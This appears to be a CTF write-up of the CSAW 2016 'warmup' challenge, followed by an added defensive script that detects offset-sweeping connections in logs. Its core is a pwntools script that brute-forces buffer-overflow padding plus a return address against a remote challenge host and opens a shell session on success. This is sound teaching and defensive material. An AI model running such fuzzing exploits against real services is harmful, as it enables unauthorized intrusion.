warmup

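Challenge source: csaw-ctf-2016-quals

Challenge description: none

This challenge comes with no attachment.

After connecting to the remote service it prints an address, so consider fuzzing.

The exploit is as follows: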

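from pwn import *

# Address appended after the padding (the service prints an address on connect)
addr = 0x40060d

def fuzz(io, num, mode):
    # num bytes of padding, then the address in the width selected by mode
    payload = b'a' * num
    if mode == 0:
        payload += p64(addr)   # 8-byte little-endian
    elif mode == 1:
        payload += p32(addr)   # 4-byte little-endian
    # mode 2: padding only
    io.recvuntil(b'>')
    io.sendline(payload)

for i in range(1000):
    for j in range(3):
        r = None  # so the except branch is safe if remote() itself fails
        try:
            r = remote('111.200.241.244', 54389)
            info('try: num = ' + str(i) + ' mode = ' + str(j))
            fuzz(r, i, j)
            flag = r.recv()
            info('get flag:' + str(flag))
            r.interactive()
        except Exception:
            # connection dropped or timed out: close it and try the next guess
            if r is not None:
                r.close()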
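
Seen from the service side, the loop above is one source opening many short connections whose input length climbs a byte at a time. The detector below is an added example, not part of the original post; the per-connection log format `(source, input_length)`, the documentation-range addresses and the thresholds are constructed assumptions.

```python
from collections import defaultdict

def sweep_sources(records, min_conns=30, min_distinct=20, min_density=0.8):
    """records: iterable of (src, input_len), one entry per connection.

    Returns {src: (connections, shortest, longest)} for every source whose
    input lengths densely cover a range, the footprint of an offset sweep.
    """
    by_src = defaultdict(list)
    for src, length in records:
        by_src[src].append(length)

    flagged = {}
    for src, lengths in by_src.items():
        distinct = set(lengths)
        lo, hi = min(distinct), max(distinct)
        # Fraction of the [lo, hi] range that was actually tried.
        density = len(distinct) / (hi - lo + 1)
        if (len(lengths) >= min_conns
                and len(distinct) >= min_distinct
                and density >= min_density):
            flagged[src] = (len(lengths), lo, hi)
    return flagged

def constructed_log():
    """Constructed sample data, not captured traffic."""
    log = []
    # Sweep source: for each padding size i, three tries (padding + 8, + 4,
    # + 0 bytes), each followed by the newline that sendline() appends.
    for i in range(20):
        for extra in (8, 4, 0):
            log.append(("203.0.113.7", i + extra + 1))
    # Busy but ordinary client: many connections, only three input lengths.
    for k in range(40):
        log.append(("198.51.100.2", (3, 12, 7)[k % 3]))
    # Occasional client: few connections with scattered lengths.
    for length in (100, 2, 50, 9, 31):
        log.append(("198.51.100.9", length))
    return log

if __name__ == "__main__":
    for src, (conns, lo, hi) in sweep_sources(constructed_log()).items():
        print(f"{src}: {conns} connections, input lengths {lo}..{hi}")
```
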
        

 

posted @ 2021-08-16 20:43  hktk1643